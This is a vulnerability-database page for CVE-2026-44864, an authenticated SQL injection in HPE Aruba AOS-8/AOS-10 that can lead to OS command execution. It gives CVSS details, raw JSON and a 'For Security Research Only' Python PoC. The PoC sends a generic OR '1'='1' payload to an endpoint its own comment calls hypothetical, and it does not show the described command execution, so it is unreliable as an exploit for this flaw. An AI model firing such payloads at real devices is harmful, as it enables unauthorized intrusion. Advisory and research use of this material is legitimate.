Security Vulnerability Report
中文
CVE-2026-44864 CVSS 7.2 HIGH

CVE-2026-44864

Published: 2026-05-12 20:16:45
Last Modified: 2026-05-12 20:16:45

Description

SQL injection vulnerabilities exist in several underlying service components accessible through the AOS-8 and AOS-10 command-line interface and management protocol. An authenticated attacker with administrative privileges could exploit these vulnerabilities by injecting crafted input into parameters that are passed unsanitized to backend database queries. Successful exploitation could allow the attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE Aruba Networking AOS-8 (具体版本请参考厂商公告)
HPE Aruba Networking AOS-10 (具体版本请参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL ( hypothetical management API endpoint for AOS) target_url = "https://<target-ip>/api/v1/system/config" # Attacker credentials (High Privilege Required) credentials = { "username": "admin", "password": "admin_password" } # Malicious payload demonstrating SQL Injection # Payload attempts to manipulate the database query crafted_input = "admin' OR '1'='1'; -- " # Vulnerable parameter structure payload_data = { "user_param": crafted_input, "action": "update_settings" } try: print("[*] Sending malicious request to AOS management interface...") # Send POST request with the crafted payload response = requests.post( target_url, json=payload_data, auth=(credentials['username'], credentials['password']), verify=False, timeout=10 ) if response.status_code == 200: print("[+] Request sent successfully. Check for OS command execution or DB changes.") print("[+] Server Response:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44864", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:45.033", "lastModified": "2026-05-12T20:16:45.033", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection vulnerabilities exist in several underlying service components accessible through the AOS-8 and AOS-10 command-line interface and management protocol. An authenticated attacker with administrative privileges could exploit these vulnerabilities by injecting crafted input into parameters that are passed unsanitized to backend database queries. Successful exploitation could allow the attacker to execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}